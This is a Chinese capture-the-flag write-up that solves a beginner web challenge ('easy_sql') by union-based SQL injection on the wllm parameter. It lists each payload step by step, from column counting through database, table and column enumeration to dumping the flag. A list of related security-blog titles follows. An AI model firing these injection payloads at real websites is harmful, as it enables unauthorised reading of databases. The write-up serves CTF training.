[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析

查看网页

有提示,参数是wllm,并且要我们输入点东西

所以,我们尝试以get方式传入

有回显,但似乎没啥用

从上图看应该是字符型漏洞,单引号字符注入

先查看字段数

/?wllm=2'order by 3--+

没回显

报错了,说明字段数是3

然后查看回显点

/?wllm=2'union select 1,2,3--+

注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。

然后查看数据库名称

/?wllm=2'union select 1,2,database()--+

得到数据库名称就可以按顺序数据库-表-列来找flag了

/?wllm=2'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
?wllm=2'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
/?wllm=2'union select 1,2,flag from test_tb--+
相关推荐
hao_wujing1 小时前
网络安全攻防演练中的常见计策
安全·web安全
Mitch3111 小时前
【漏洞复现】CVE-2015-3337 Arbitrary File Reading
elasticsearch·网络安全·docker·漏洞复现
燕雀安知鸿鹄之志哉.1 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
Mitch3112 小时前
【漏洞复现】CVE-2015-5531 Arbitrary File Reading
web安全·elasticsearch·网络安全·docker·漏洞复现
ccc_9wy2 小时前
暗月红队考核靶场ack123的测试报告[细节](二)
网络安全·暗月ack123·socks5内网代理·mssql漏洞·杀软对抗·制作免杀木马·烂土豆提权
lucky_syq2 小时前
Hive SQL和Spark SQL的区别?
hive·sql·spark
鸭梨山大。3 小时前
Jenkins安全部署规范及安全基线
安全·中间件·jenkins
网安-轩逸3 小时前
网络安全核心目标CIA
安全·web安全
鸭梨山大。5 小时前
Jenkins 任意文件读取(CVE-2024-23897)修复及复现
安全·中间件·jenkins
黑客老陈5 小时前
新手小白如何挖掘cnvd通用漏洞之存储xss漏洞(利用xss钓鱼)
运维·服务器·前端·网络·安全·web3·xss